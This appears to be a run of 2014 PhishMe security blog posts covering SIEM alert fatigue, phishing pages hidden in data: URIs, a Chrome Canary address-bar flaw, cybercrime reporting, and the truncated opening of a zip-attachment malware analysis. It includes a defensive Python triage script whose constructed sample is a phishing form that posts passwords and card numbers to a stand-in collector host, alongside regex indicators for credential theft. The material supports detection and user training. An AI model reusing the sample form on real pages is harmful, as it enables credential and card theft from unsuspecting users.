SIEM: So Many Alerts, So Little Time

Software vendors participate in industry events for various reasons. We attend to share information as speakers and to learn as attendees. You’ll see us sponsor tote bags, snack stations, and even lunch. We are there to raise awareness of our solutions and generate leads for our sales team. We like scanning badges as much as you like getting schwag but for most vendors like us, the best use of our time in the booth is not spent waving a scanner.

It is “events season” in the security world and PhishMe has been an active participant in events like RSA, FS-ISAC and more. SecureWorld, hosted at the Cobb Galleria in Atlanta, offered a particularly enthusiastic crowd, well-attended sessions and an expo floor filled with vendors interacting with conference attendees. We made some new friends with our neighbors from PhishLine and enjoyed meeting everyone who stopped by our booth to learn more about how we’re helping companies deal with the latest email-based phishing and malware attacks. It’s a great opportunity for us, as a company serving the InfoSec community, to learn more about the latest problems companies are trying to solve and to hear firsthand about the state of cybersecurity from those in the trenches.

All of this activity led to a successful industry event and a lot of fun. However, there is one key benefit of attending industry events like this that is rarely discussed. We were fortunate enough to experience it this year at SecureWorld: the conversations.

One particular conversation stands out from the rest this week. We met a gentleman whose main responsibility is the company’s Security Information and Event Management (SIEM). He has successfully worked with internal teams to integrate logs from their AV, DLP, IDS and a few other appliances. After hearing so many stories about scaled-back SIEM implementations or completely stalled deployments resulting in expensive shelfware, I offered my congratulations and started asking about this significant achievement. I was eager to take notes! Everybody needs a win now and then, and we usually only hear about the bad news. So, I was surprised and a little disheartened when his reply wasn’t about the success but rather the frustration in getting other teams to leverage the information coming out of the SIEM. At best, the response has been sluggish. Security teams are always busy and automated ticketing systems can be overwhelming. But still, I have to wonder if responding to tickets initiated by the SIEM is a higher priority at Target these days?

We can probably all agree that security alerts should be handled and followed up. But “should” is not necessarily reality. In a recent article published on DarkReading, Joshua Goldfarb discussed how security professionals often experience alert fatigue and become desensitized to security alerts. The reason, argues Goldfarb, is that many organizations have a low signal-to-noise ratio, meaning that there is a high volume of signals, the majority of which are noise. He offers the recent breaches at Target and Neiman Marcus as examples of instances where alerts were issued but were not handled properly by internal security teams.

I also have to wonder if better information about the day’s top threats could help elevate the important SIEM alerts to make sure critical issues are addressed quickly? Could threat intelligence be used by the SIEM to escalate specific tickets that would otherwise remain under the radar of the dedicated but stressed InfoSec team?

Phishing Attacks Target Google Users with Weakness in Chrome: What You Need to Know

If your employees are users of Google Chrome and/or Mozilla Firefox, your network could be vulnerable to a unique phishing attack targeting the two most widely used browsers in the world. Several media outlets are covering the exploit, which abuses uniform resource identifiers (URIs), a mechanism that Google Chrome and other web browsers use to display data.

This attack, which is difficult to identify via traditional methods, allows cybercriminals to gain access to Google Play, Google+ and Google Drive. This means that any sensitive information stored within each of those areas is up for the taking. In the case of Google Play that means credit card information. In the case of Google Drive, that means a considerable amount of potentially highly sensitive data.

Other brands have also been spoofed recently using the same browser display vulnerability. On May 8, 2014, PhishMe’s phishing intelligence analysts noticed a quirk in Chrome. When viewing an eBay Canada spoofed login page in Chrome, the only text displayed in the browser address bar was the word “data:” as shown in the image below:

That phishing attack used what is known as the Data URI Scheme to encode the entire source code of the phishing page into the address bar. As the next screenshot shows, however, Firefox displays the Base64 encoding in the address bar, which a security-savvy user would be more likely to notice.

The second and third steps of the eBay Canada phishing attack were also carried out using the Data URI Scheme. As the victim was enticed to enter more of their personally identifying information, the attacker presented page after page of spoofed eBay pages, eventually collecting the victim’s eBay user ID, password, full name, address, ZIP code, mother’s maiden name, date of birth, credit card number, CVV code, and card expiration date.
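As an added example (not PhishMe’s own code or tooling), the following Python checker takes a defender’s view of the technique described above: it decodes a data: URI of the kind the eBay Canada phish used and flags markers of a credential-harvesting page so an email gateway or analyst can triage it. The sample page, the collector hostname and the indicator regexes are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample: a spoofed login page delivered entirely inside a data: URI.
# The HTML and the collector host are made up; they are not the real eBay Canada phish.
SAMPLE_HTML = (
    '<html><body><h1>Sign in to your account</h1>'
    '<form method="POST" action="http://collector.example.invalid/post.php">'
    '<input name="userid"><input type="password" name="pass">'
    '<input name="ccnum"><input name="cvv"></form></body></html>'
)
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML.encode()).decode()

# data:[<mediatype>][;base64],<payload>  (RFC 2397 shape)
DATA_URI_RE = re.compile(
    r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<payload>.*)$", re.S
)

# Indicators a triage rule might look for inside the decoded page (constructed list).
SUSPICIOUS = {
    "password_field": re.compile(r'<input[^>]*type\s*=\s*["\']?password', re.I),
    "external_form_action": re.compile(r'<form[^>]*action\s*=\s*["\']?https?://', re.I),
    "card_field": re.compile(r'name\s*=\s*["\']?(cc|card|cvv)', re.I),
}


def decode_data_uri(uri):
    """Return (mime, decoded_text) for a data: URI, or None if the string is not one."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        return None
    mime = m.group("mime") or "text/plain"
    payload = m.group("payload")
    if ";base64" in m.group("params"):
        # Tolerate stripped padding, which phishing kits sometimes omit.
        raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
        text = raw.decode("utf-8", errors="replace")
    else:
        text = unquote(payload)  # percent-encoded variant of the scheme
    return mime, text


def assess_uri(uri):
    """Triage a URL: report whether it is a data: URI and which indicators fired."""
    decoded = decode_data_uri(uri)
    if decoded is None:
        return {"is_data_uri": False, "mime": None, "indicators": []}
    mime, text = decoded
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
    return {"is_data_uri": True, "mime": mime, "indicators": hits}
```

Any data: URI carrying text/html with a password field is worth escalating even when no other indicator fires, since a legitimate site has no reason to ship its login form that way.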

The Google account phish in the news also uses the Data URI Scheme. The Google phishing attack was reportedly initiated via an email message in which the attackers posed as Google with the subject “data notice” or “new lockout notice.”

These phishing scams play on users’ fears that they are being targeted by cybercriminals, yet responding to those very attacks results in them giving their sensitive information to the attackers. The use of the data URI scheme makes these phishing scams easy to identify, but only if users know what to look for.

In the case of the eBay Canada phishing attack, the word ‘data’ may arouse suspicion, but would that suspicion be enough for the user to recognize that this was in fact a scam? For many employees, Base64 encoding displayed in the address bar may not even be noticed. Unless employees are trained to recognize these signs of phishing attacks, there is a high chance that they may be fooled. That doesn’t just mean that they will be handing over their eBay credentials. Many phishing attacks on businesses are conducted to obtain sensitive business login credentials.

Would your employees be able to identify phishing scams like these? Do you provide training to ensure that ALL of your employees are aware of these indicators of a phishing attack? Do you test that knowledge to see whether it has been taken on board and is being applied?

Abusing Google Canary’s Origin Chip makes the URL completely disappear

Canary, the leading-edge v36 of the Google Chrome browser, includes a new feature that attempts to make malicious websites easier to identify by burying the URL and moving the domains from the URI/URL address bar (known in Chrome as the “Omnibox”) into a location now known as “Origin Chip”. In theory, this makes it easier for users to identify phishing sites, but we’ve discovered a major oversight that makes the reality much different.

Canary is still in beta, but a flaw that impacts the visibility of a URL is typically something we only see once every few years. We’ve discovered that if a URL is long enough, Canary will not display any domain or URL at all, instead showing an empty text box with the ghost text “Search Google or type URL.” While Canary is intended to help the user identify a link’s true destination, it will actually make it impossible for even the savviest users to evaluate the authenticity of a URL.

Numbers of Victims of Cybercrime are Soaring

Reports from law enforcement agencies around the world show that there have been even more victims of cybercrime in the past 12 months than in any other year. Attacks are being conducted alarmingly frequently, and cybercriminals are becoming even more brazen. However, cybercrime is still not dealt with in the same way as other types of crime.

Say you leave home, only to return to your front door kicked in. Everything of value has been stolen. What would you do?

You’d call the police immediately, right?

Now pretend you get an email from what looks to be your bank. They inform you that your banking password needs to be changed. A link to do so is embedded in the email. The next time you log into your account, $1,000.00 is missing. Who would you call?

Most people would instinctively call their bank. But, why wouldn’t they call the police?

You should call the police first. After all, it is a crime. However, this is not how we typically approach online theft. Not only have I devoted my life to identifying and stopping cybercrime, but I’m a victim as well. My mission from the beginning has been this: I want to change people’s thinking about online theft.

On a trip to the grocery store, my card was declined for a small purchase. Knowing that there was more than enough to cover the bill, I contacted my bank only to find out that someone had gone to a Wal-Mart three times and spent $1,800.00 out of my account.

I called the police immediately. They only wanted to file a police statement so the bank would return the money.

The main focus wasn’t just getting my money returned. I also wanted to track down the criminal and put them in jail. However, the police didn’t seem interested. The crook lived in San Diego and I’m in Alabama. They would need to catch the criminal, fly him to Alabama, then house and feed him until the trial. The cost of these expenditures would far outweigh the $1,800.00 that was stolen.

Not satisfied with what I was hearing, I contacted the San Diego District Attorney. They informed me that they’d be glad to help as long as I’d sign an affidavit stating my wife or I would fly to San Diego to testify. Without a witness during the trial, the criminal would most likely be let go with no penalties. The cost of the ticket with room and board during the trial would have been more than the $1,800 I had already lost.

I was unable to afford the trip, so I began fighting in a different way.

I began devoting all my time to tracking down cybercriminals and sharing the information that I found, in order to help people protect themselves.

I began to ask, “Why don’t we treat cybercrime the same as physical crime?” If someone breaks into your home and steals your TV, we blame the robber. If someone steals $1,000.00 out of your PayPal account, we blame the victim for not having sufficient firewall protection or prevention software. What’s wrong with this picture?

Why are these crimes not acknowledged or tracked by the government? In 2012 alone, there were 18 new victims of cybercrime every second. 9 million of those fell victim to fake banking websites. 19 million Americans had money taken off their credit cards without authorization. 43% of Americans are still the target of large amounts of spam. Despite this, none of these activities are tracked by the Department of Justice.

While I continue the fight to inform people of cybercriminal activity and change tracking procedures, what can the consumer do to protect himself? Consumers should monitor receipts, credit card statements and bank accounts. And, although this isn’t the way that things are currently handled, I believe in the mantra “If you see something, say something.” When consumers are victimized by cybercrime, they should call the police, and if the police don’t respond the way that we all think they should, consumers should let their elected officials know by contacting their congressmen and senators. It needs to be known that we want justice against these crimes.

Learn more about my personal experience with cybercrime by viewing my recent talk on the TedX Birmingham Stage:

How did you get into the security industry? Was it a personal experience with cybercrime? Share your experience in the comments section below.

Phishing with a malicious .zip attachment

A few weeks ago, we received a round of phishing emails with malware that seemed a little more special than your run-of-the-mill ZeuS, so we decided to give it some analysis. The email was reported by a user at PhishMe. We really do drink our own Kool-Aid. Figure 1 shows a screenshot of the email that is being analyzed.

Figure 1 — Original Message